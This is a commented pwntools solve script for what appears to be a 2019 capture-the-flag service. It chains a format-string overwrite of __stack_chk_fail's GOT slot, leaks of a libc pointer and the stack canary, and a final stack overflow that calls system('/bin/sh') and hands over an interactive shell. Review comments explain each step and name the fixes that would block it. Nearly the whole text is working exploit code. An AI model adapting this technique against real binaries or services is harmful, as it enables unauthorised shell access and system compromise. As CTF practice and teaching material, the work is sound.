```
# pwntools solve script for a remote CTF service that echoes input back after
# the prompt 'Type something>'. It sends four inputs in sequence:
#   1. a format-string write that redirects __stack_chk_fail to _start,
#   2. a format-string read that leaks a libc pointer,
#   3. a format-string read that leaks the stack canary,
#   4. a stack overflow that reuses the leaked canary and calls system("/bin/sh").
# NOTE(review): the target binary is not shown here. The steps below imply that
# it passes user input to a printf-style function as the format string and reads
# more than its buffer holds - confirm against the binary. The hard-coded
# 0x0804.... addresses presumably mean a non-PIE 32-bit build with a writable
# GOT (no full RELRO). A constant format string ("%s") and full RELRO are the
# fixes that would break steps 1-3; the canary alone does not help once it can
# be leaked.
# NOTE(review): the str + p32(...) concatenation and generator .next() suggest
# this was written for Python 2.
from pwn import *
r= remote('shell.2019.nactf.com', 31732)
# Address that fmtstr_payload writes to; presumably the GOT slot of
# __stack_chk_fail - TODO confirm against the binary.
__stack_chk_fail = 0x0804c014
# Address written into that slot; named after the program entry point.
_start = 0x08049090
# overwrite __stack_chk_fail() to _start(), then trigger __stack_chk_fail()
# format offset is 7 (the first argument to fmtstr_payload)
payload = fmtstr_payload(7, {__stack_chk_fail: _start})
# Pad the payload to 64 bytes and append 6 more. Presumably the buffer is 64
# bytes, so the extra bytes corrupt the canary and the failed check now jumps
# to _start, giving a fresh prompt instead of aborting.
r.sendlineafter('Type something>', payload + 'a'*(64-len(payload))+'aaaaaa')
# trigger __stack_chk_fail() again (68 bytes sent: 4 + 4 + 56 + 4)
# leak libc offset, then get system() '/bin/sh' addresses
# '%7$s' dereferences the 4-byte address placed at the start of the input, the
# same argument index 7 used above. 0x0804c018 is presumably fwrite's GOT slot,
# since the leaked value is compared with libc.symbols['fwrite'] below.
r.sendlineafter('Type something>', p32(0x0804c018) + '%7$s' +'a'*(64-8) + "aaaa")
r.recvuntil('You typed: ')
# Local copy of libc; the computed addresses are only right if it is the same
# build as the one the remote service uses.
libc = ELF('libc.so.6')
# Skip 4 bytes, presumably the echoed address that opened the input.
r.recv(4)
# Next 4 bytes are read as a little-endian pointer; subtracting the symbol
# offset of fwrite gives the libc load offset.
libc_off = u32(r.recv(4)) - libc.symbols['fwrite']
system_adr = libc_off + libc.symbols['system']
# First occurrence of the '/bin/sh' string in libc, rebased by the load offset.
binsh = libc.search('/bin/sh').next() + libc_off
# trigger __stack_chk_fail() again (68 bytes sent: 6 + 26 + 36)
# leak main() canary
# '%31$x ' prints format argument 31 as hex followed by a space; the script
# takes that value to be the canary.
r.sendlineafter('Type something>', '%31$x '+'a'*(32-6) + 'b'*36)
r.recvuntil('You typed: ')
# Parse the hex text up to the first space into an integer.
canary = int(r.recvuntil(' ').strip(),16)
# Final input: 64 filler bytes, the leaked canary, 12 filler bytes, system_adr
# twice, then binsh. Presumably the canary check now passes, the first
# system_adr lands on the saved return address, the second fills the slot for
# system's own return address, and binsh is its argument - TODO confirm the
# frame layout against the binary.
r.sendlineafter('Type something>', 'a'*64 + p32(canary) + 'a'*12 + p32(system_adr)*2 + p32(binsh))
# Hand the connection over to the terminal.
r.interactive()
```